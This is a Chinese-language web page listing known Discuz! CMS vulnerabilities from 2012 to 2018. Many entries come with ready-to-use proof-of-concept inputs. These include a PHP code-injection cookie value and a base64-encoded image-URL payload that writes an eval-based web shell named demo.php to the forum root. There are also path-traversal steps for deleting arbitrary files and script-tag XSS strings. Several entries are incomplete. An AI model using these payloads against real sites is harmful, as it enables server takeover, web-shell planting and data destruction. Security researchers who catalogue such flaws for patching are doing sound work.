应⽤安全-CMS-Discuz漏洞汇总
Discuz ML! V3.X 代码注⼊
Date
2019
类型
代码注⼊导致RCE
影响范围
Discuz!ML v.3.4、Discuz!ML v.3.2、Discuz!ML v.3.3 product
poc
_language=sc'.phpinfo().';
SSV-90861
Date:
2012
类型:
敏感信息泄露
影响范围:
DZ x2.5
POC:
/uc_server/control/admin/db.php
/source/plugin/myrepeats/table/table_myrepeats.php
/install/include/install_lang.php
Discuz! X2.5 远程代码执⾏
Date:
2012
类型:
RCE
前置条件:
(1).注册任意账户
(2).登陆⽤户,发表blog⽇志(注意是⽇志)
(3).添加图⽚,选择⽹络图⽚,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}(4).访问⽇志,论坛根⽬录下⽣成demo.php,⼀句发密码c
影响范围:
v2.5
Discuz!X2/2.5弱⼝令破解漏洞
Date:
2013
类型:
登录界⾯暴⼒破解
影响范围:
Discuz!X2/2.5
ssvid-93588
discuz还有人用吗
Date:
2014
类型:
任意⽂件删除
前置条件:
(1)登陆DZ前台
(2)请求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../&profilesubmit=1&formhash=b644603b
修改成功之后出⽣地就会变为../../../
(3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传⽂件(普通图⽚即可)请求后⽂件被删除
影响范围:
version<=3.4
SSV-96608
Date:
2014.10
类型:
前台任意⽂件删除
影响范围:
SSV-89024
Date:
2015.1
类型:
Discuz X2.5 /source/class/class_image.php 命令执⾏漏洞
影响范围:
Discuz X2.5
Discuz! X系列远程代码执⾏漏洞
Date:
2015.8
类型:
RCE + XML反序列化
前置条件:
访问:/api/uc.php
影响范围:
SSV-91183
Date:
2016.3
类型:
SSRF
影响范围:
Discuz! X2 X3
POC:
www.internetblog/archives/6068.html?mip
CVE-2018-14729
Date:
2018.8
类型:
远程代码执⾏
前置条件:
登录后台
影响范围:
Discuz! 1.5-2.5
Discuz
Discuz!X ≤3.4任意⽂件删除漏洞分析
Discuz!7.2/X1 第三⽅插件SQL注⼊及持久型XSS漏洞
SQL注⼊及跨站脚本漏洞。
moodwall.inc.php
发表⼼情处直接插⼊html代码
code 区域
"><script>alert(/xss/)</script>
Discuz! X1某页⾯存在XSS漏洞
简要描述:
页⾯对取到的参数没有过滤,直接echo到了html⾥
详细说明:
api/db/dbbak.php页⾯,对$apptype缺少必要的过滤,调⽤api_msg()函数时直接将$apptype echo到了html中。漏洞证明:
**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。